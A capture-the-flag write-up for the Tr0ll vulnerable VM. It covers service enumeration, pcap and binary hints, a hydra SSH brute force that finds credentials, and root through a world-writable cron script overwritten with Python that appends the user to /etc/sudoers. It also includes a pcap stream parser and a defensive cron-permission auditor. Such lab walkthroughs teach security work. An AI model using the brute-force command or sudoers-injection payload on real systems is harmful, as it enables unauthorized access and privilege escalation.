

Posted in CTF



Our initial scan yields:

21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

We’ll enumerate these three services to map the target’s attack surface and get a clear picture of the possible vectors before committing to one, which cuts down the time wasted in rabbit holes.

  • FTP
  • SSH
  • HTTP


Starting with FTP, we confirm that the service really is vsftpd and that it allows anonymous login.

root@kali:/usr/share/nmap/scripts# nmap -sV
root@kali:/usr/share/nmap/scripts# nmap --script ftp-anon.nse -p21

Our initial scan was correct. We can log in anonymously over FTP to do some initial investigation.

root@kali:/home# ftp
Connected to
220 (vsFTPd 3.0.2)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        112          4096 Aug 10  2014 .
drwxr-xr-x    2 0        112          4096 Aug 10  2014 ..
-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap
226 Directory send OK.

Trying to PUT files or traverse into other directories is futile, but all hope is not lost: the listing holds a lone file, lol.pcap.

We can GET this file and save it to our local machine. Before we commit to this vector we’ll enumerate the other services, but this goes to the top of our to-do list.


Since SSH is a common and relatively hardened service, we won’t treat it as low-hanging fruit.

We can verify the SSH version and check which authentication methods the server offers for the root user: a verbose client connection shows that password authentication is on the list. Note that this only tells us password auth is enabled in general; the server advertises the same methods whether or not root login is actually permitted.

root@kali:/# nmap -sV -p22
root@kali:/# ssh -vvv root@

We could brute force SSH as root, but that goes near the bottom of the list.


Running Nikto, a few things come up, but nothing really juicy:

  • Apache/2.4.7
  • OS: Ubuntu
  • 1 entry in robots.txt: /secret
  • Apache default README page
  • Two pages, /index.html and /secret/index.html, each serving a single image

We can use curl to verify headers and check if anything jumps out at us.

root@kali:/# curl -i -L
root@kali:/# curl -i -L
root@kali:/# curl -i -L

Nothing really. Let’s brute force some dirs.

root@kali:/# dirb
root@kali:/# gobuster -u -e -s '200,403,204,500' -w /usr/share/seclists/Discovery/Web_Content/apache.txt

Just what we already found with Nikto.

We can always run larger wordlists to dig into the web server further; that goes on the to-do list near the end as well.

Plan of Attack

  1. Investigate lol.pcap
  2. Brute force SSH with root or found usernames
  3. Run large wordlist (which we can do in the background)

We’ve downloaded the lol.pcap file, which we can open in Wireshark.

Following a TCP stream in this capture gives an idea of what the file contains. Make sure to clear the stream filter afterwards, because the important part is in a different stream:

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close... gotta TRY HARDER!
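Wireshark’s Follow TCP Stream is the quick way, but the same view can be pulled out of a capture programmatically, which is handy when you want to grep every conversation at once. The script below is an added example and not part of the original post: it parses classic libpcap files (not pcapng) with only the standard library, joins both directions of each TCP conversation in capture order, and runs a strings-style scan over the reassembled bytes. The SAMPLE_PCAP it builds is constructed here to mimic the hint and is not the contents of lol.pcap; to run it over the real file, pass open('lol.pcap', 'rb').read() to stream_strings.

```python
import re
import struct

# libpcap magic numbers: byte order of the file, microsecond vs nanosecond timestamps
PCAP_MAGICS = {
    b"\xd4\xc3\xb2\xa1": "<", b"\x4d\x3c\xb2\xa1": "<",   # little-endian (us, ns)
    b"\xa1\xb2\xc3\xd4": ">", b"\xa1\xb2\x3c\x4d": ">",   # big-endian (us, ns)
}
LINKTYPE_ETHERNET = 1


def iter_frames(data):
    """Yield raw Ethernet frames from a classic libpcap file held in memory (pcapng is not handled)."""
    if len(data) < 24 or data[:4] not in PCAP_MAGICS:
        raise ValueError("not a classic libpcap file")
    endian = PCAP_MAGICS[data[:4]]
    # global header: magic, major, minor, thiszone, sigfigs, snaplen, linktype
    linktype = struct.unpack(endian + "IHHiIII", data[:24])[6]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled (linktype %d)" % linktype)
    off = 24
    while off + 16 <= len(data):
        # per-packet header: ts_sec, ts_frac, captured length, original length
        incl_len = struct.unpack(endian + "IIII", data[off:off + 16])[2]
        off += 16
        frame = data[off:off + incl_len]
        if len(frame) < incl_len:
            break  # truncated capture: stop rather than mis-parse the tail
        off += incl_len
        yield frame


def tcp_segment(frame):
    """Return ((src_ip, sport), (dst_ip, dport), payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[0] >> 4 != 4 or ip[9] != 6 or ihl < 20 or total_len < ihl + 20 or len(ip) < total_len:
        return None
    ip = ip[:total_len]                       # drop Ethernet padding past the datagram
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return (src, sport), (dst, dport), tcp[data_off:]


def follow_streams(data):
    """Concatenate TCP payloads per conversation (both directions, in capture order).
    No sequence-number reassembly: retransmitted or out-of-order segments appear as captured."""
    streams = {}
    for frame in iter_frames(data):
        seg = tcp_segment(frame)
        if seg is None:
            continue
        a, b, payload = seg
        key = tuple(sorted([a, b]))           # direction-independent conversation key
        streams.setdefault(key, bytearray()).extend(payload)
    return {k: bytes(v) for k, v in streams.items()}


def stream_strings(data, min_len=4):
    """strings(1)-style view of every TCP conversation in the capture."""
    printable = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return {k: [m.decode("ascii") for m in printable.findall(v)]
            for k, v in follow_streams(data).items()}


def build_pcap(segments):
    """Write a little-endian Ethernet pcap in memory from (src_ip, sport, dst_ip, dport, payload)
    tuples. Used only to construct test input here; MACs and checksums are left zero."""
    out = bytearray(struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET))
    for i, (src, sport, dst, dport, payload) in enumerate(segments):
        tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), i, 0, 64, 6, 0,
                         bytes(int(o) for o in src.split(".")),
                         bytes(int(o) for o in dst.split("."))) + tcp
        frame = b"\x00" * 12 + b"\x08\x00" + ip
        out += struct.pack("<IIII", 0, i, len(frame), len(frame)) + frame
    return bytes(out)


# Constructed sample mimicking the hint seen in lol.pcap; not the real capture.
SAMPLE_PCAP = build_pcap([
    ("10.0.0.5", 40000, "10.0.0.10", 80, b"GET /secret/ HTTP/1.0\r\n\r\n"),
    ("10.0.0.10", 80, "10.0.0.5", 40000,
     b"HTTP/1.0 200 OK\r\n\r\nyou almost found the sup3rs3cr3tdirlol :-P"),
])

if __name__ == "__main__":
    for (a, b), found in stream_strings(SAMPLE_PCAP).items():
        print("%s:%d <-> %s:%d" % (a + b))
        for s in found:
            print("   ", s)
```

Because the conversation key is the sorted pair of endpoints, both directions land in one bucket, which is what Follow TCP Stream shows you. The trade-off is that nothing is reordered by sequence number, so on a lossy capture you read the bytes as they were seen on the wire.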

Browsing to that sup3rs3cr3tdirlol directory on the web server gives us a directory listing with a single ELF file, roflmao.

Downloading it to our local machine and digging into it, we find a hint:

root@kali:~/Downloads# file roflmao 
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
root@kali:~/Downloads# strings roflmao 
Find address 0x0856BF to proceed
GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2

“Find address 0x0856BF to proceed.” Using that string as a directory name on the web server gives us another listing.

Two folders, each with one file. One file looks like a good user list; the other folder, “this_folder_contains_the_password”, holds a file named “Pass.txt” containing the string Good_job_:)

Trying the newly built user list (tru.txt) with that password string should give us a successful SSH login, right? Or maybe FTP..? Wrong (I tried).

Since this machine is named tr0ll, and it has already been sneaky with us, we take a step back and look at the listing again. Nothing hidden in headers or source, but look at that folder name once more: this_folder_contains_the_password/

“This folder” contains the password, not the file: so the file name itself, Pass.txt, would technically be it, right? We’ll see…

root@kali:/# hydra -t 7 -L /home/tru.txt -p Pass.txt ssh
[22][ssh] host:   login: overflow   password: Pass.txt

A successful hit: overflow:Pass.txt

Logging in with these creds, we have a limited low-privilege shell. Working through the basic Linux privilege escalation checklist, we get to the point of searching for world-writable directories:

$ find / -writable -type d 2>/dev/null

Nothing in /tmp, but /var/tmp turns up something: a reference to a cleaner app (which ain’t stock), with a hint that it is run by a root cron job every 2 minutes.

$ cd /var/log
$ cat cronlog
*/2 * * * *

So let’s find this cleaner Python app. A basic locate or find brings no luck, but the find command below does yield something:

$ find / -name '*cleaner*' 2>/dev/null | grep

It’s located in /lib/log/ AND it’s world-writable. Since root executes it, we can replace the script body with one that adds our low-privilege user to /etc/sudoers. The appended line must be valid sudoers syntax: a malformed line breaks sudo for everyone, including us.

#!/usr/bin/env python
import os

# runs as root from the */2 cron job; grant the low-priv user full sudo
os.system('echo "overflow ALL=(ALL:ALL) ALL" >> /etc/sudoers')

Save it, wait the 2 minutes per cronlog, then:

$ sudo su
sudo: unable to resolve host troll
[sudo] password for overflow: 
root@troll:~# whoami
root@troll:~# cat proof.txt 
Good job, you did it! 


Good stuff, we have root.
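The manual hunt above (world-writable directories, then the cron log, then the find) can be folded into one check that is just as useful on the defending side. The script below is an added example, not from the post: it parses /etc/crontab and /etc/cron.d style entries, keeps the ones that run as root, and flags any absolute path they reference that is either world-writable itself or sits in a world-writable directory without the sticky bit (which lets anyone unlink and recreate the file even when the file itself is locked down). The crontab text and the staged directory tree are constructed here to mirror the box; nothing is read from the live system unless you call audit_cron on /etc/crontab yourself.

```python
import os
import shutil
import stat
import tempfile


def is_world_writable(path):
    """True when the mode of `path` grants write to 'other' (symlinks are followed)."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return False


def replaceable_parent(path, stop):
    """Walk from the parent of `path` up to and including `stop`; return the first directory
    that is world-writable without the sticky bit. Anyone can unlink and recreate entries
    there, so even a root-owned, read-only script inside it can be swapped out."""
    d = os.path.dirname(path)
    while True:
        try:
            mode = os.stat(d).st_mode
        except OSError:
            return None
        if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
            return d
        parent = os.path.dirname(d)
        if d == stop or parent == d:
            return None
        d = parent


def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab or /etc/cron.d style lines: five time fields
    or an @keyword, then the user, then the command. Comments, blanks and VAR=value lines
    are skipped. Per-user crontabs have no user column and are not handled here."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first and not first.startswith("@"):
            continue
        fields, needed = (line.split(None, 2), 3) if first.startswith("@") else (line.split(None, 6), 7)
        if len(fields) == needed:
            yield fields[-2], fields[-1]


def audit_cron(text, stat_root=""):
    """Return [(path, reason)] for each absolute path referenced by a root cron entry that a
    low-privileged user could modify or replace. `stat_root` is prefixed to every path so the
    check can run against a staged tree instead of the live filesystem."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for token in command.split():
            if not token.startswith("/"):
                continue
            real = stat_root + token
            if is_world_writable(real):
                findings.append((token, "world-writable file"))
                continue
            parent = replaceable_parent(real, stat_root or "/")
            if parent is not None:
                findings.append((token, "replaceable: %s is world-writable without sticky bit"
                                 % parent[len(stat_root):]))
    return findings


# Constructed sample in /etc/crontab format; the cleaner entry mirrors the box's cronlog.
CRON_SAMPLE = """\
PATH=/usr/local/bin:/usr/bin:/bin
*/2 * * * *  root     python /lib/log/cleaner.py
0 3 * * *    root     /usr/local/bin/backup.sh
@hourly      root     /opt/jobs/job.sh
*/5 * * * *  www-data /opt/jobs/job.sh
"""


def staged_demo():
    """Stage a throwaway tree with the relevant modes (constructed, not copied from the VM)
    and audit CRON_SAMPLE against it."""
    root = tempfile.mkdtemp()
    try:
        for d, mode in [("/lib", 0o755), ("/lib/log", 0o755), ("/usr", 0o755), ("/usr/local", 0o755),
                        ("/usr/local/bin", 0o755), ("/opt", 0o755), ("/opt/jobs", 0o777)]:
            os.mkdir(root + d)
            os.chmod(root + d, mode)
        for f, mode in [("/lib/log/cleaner.py", 0o777),       # the Tr0ll misconfiguration
                        ("/usr/local/bin/backup.sh", 0o755),  # sane: root-owned, not writable
                        ("/opt/jobs/job.sh", 0o755)]:         # sane file, but its directory is not
            with open(root + f, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(root + f, mode)
        return audit_cron(CRON_SAMPLE, stat_root=root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for path, reason in staged_demo():
        print(path, "->", reason)
    # on a live box: audit_cron(open("/etc/crontab").read())
```

This only looks at the o+w bit; group-writable paths that your current account can reach (which the find -writable run above does catch) are a separate check, as are cron entries that run an interpreter with a relative script name resolved through PATH.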

